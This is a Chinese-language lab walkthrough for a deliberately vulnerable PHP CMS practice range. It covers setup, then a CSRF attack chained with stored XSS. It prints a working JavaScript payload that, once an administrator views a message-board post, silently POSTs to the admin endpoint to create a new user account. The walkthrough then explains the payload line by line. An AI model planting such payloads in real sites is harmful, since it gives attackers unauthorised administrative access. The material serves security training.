目录
0x01安装靶场
下载源码,解压到网站根目录
1.修改数据库配置文件
打开源码,进入到include目录下,打开数据库配置文件database.inc.php
将数据库的用户名和密码修改为自己数据库的用户名和密码,数据库名可以不改。然后保存。
2.导入SQL文件
方法一:使用Navicat导入
打开navicate,新建数据库,名字写为刚才我们上面的数据库名,若没有修改,数据库名就是cms
右键点击我们刚才的数据库,选择运行SQL文件(若右键之后,运行SQL文件是灰色的,则先点击打开数据库)
选择源码下的install.sql文件
然后浏览器打开访问网站。
方法二:命令行方式导入
打开命令行,win+r,输入cmd,回车,在命令行界面输入mysql -u root -p
输入密码。
创建数据库 creat database cms
选中数据库use cms
,导入sql文件,source sql文件地址
,
例如:source D:\phpstudy_pro\WWW\cms\install.sql
导入成功,打开浏览器访问网站。
访问路径:域名\cms\index.php
0x02分析功能点的请求接口,构造恶意请求
进入后台管理界面找到添加用户的功能点,进行抓包分析
管理员用户名admin,密码123456
添加用户,进行抓包
右键利用burpsuite自带的csrfPOC生成工具生成
把这个复制写到一个页面上,在登录到那个cms管理员账户的情况下,访问这个页面,就会发现用户里面多了一条用户记录。由于CSRF利用条件比较苛刻,需要受害者点击恶意请求。因此我们可需要借助XSS来扩大危害,借用XSS漏洞执行JS代码,让JS直接发起请求,从而不需要让受害者点击恶意请求了。
0x03寻找xss漏洞
编写恶意JS代码
<script> xmlhttp = new XMLHttpRequest(); xmlhttp.open("post","http://localhost:8083/cms/admin/user.action.php",false); xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded"); xmlhttp.send("act=add&username=zhang&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0"); </script>
代码说明
xmlhttp = new XMLHttpRequest();
创建 XMLHttpRequest 对象:
XMLHttpRequest
是 JavaScript 用于与服务器进行交互的对象。在这里,创建了一个新的XMLHttpRequest
对象xmlhttp
。
xmlhttp.open("post", "http://localhost:8083/cms/admin/user.action.php", false);
初始化请求
:
open()
方法用于初始化一个请求。这里指定了请求方法为POST
。第一个参数
"post"
表示 HTTP 请求的方法是 POST。第二个参数
http://localhost:8083/cms/admin/user.action.php
是请求的 URL。第三个参数
false
表示同步请求(阻塞调用),即 JavaScript 执行将暂停,直到请求完成。
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
设置请求头:
setRequestHeader()
方法用于设置 HTTP 请求头。这里设置Content-type
为application/x-www-form-urlencoded
,表示发送的数据将按照表单 URL 编码的方式进行编码。
xmlhttp.send("act=add&username=yuanboss&password=123456&password2=123456&button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7&userid=0");
发送请求
:
send()
方法用于发送 HTTP 请求。这里发送的数据是一个 URL 编码的字符串:
"act=add"
:操作类型是“add”,表示要添加一个用户。"username=zhang"
:用户名是“zhang”。"password=123456"
和"password2=123456"
:密码是“123456”,两次确认输入。"button=%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7"
:提交按钮的值,URL 解码后是“添加用户”。"userid=0"
:用户 ID 为0,通常表示新用户。
通过查询cms靶场,找到了一个留言板,因为留言板需要管理员去审核,所以可以进行一个存储型xss注入。
在留言板留言我们刚才构造的恶意JS代码,进行xss+csrf组合攻击
模仿管理员去审核留言
打开账号管理,查看账号
多了一条用户名为张的用户记录。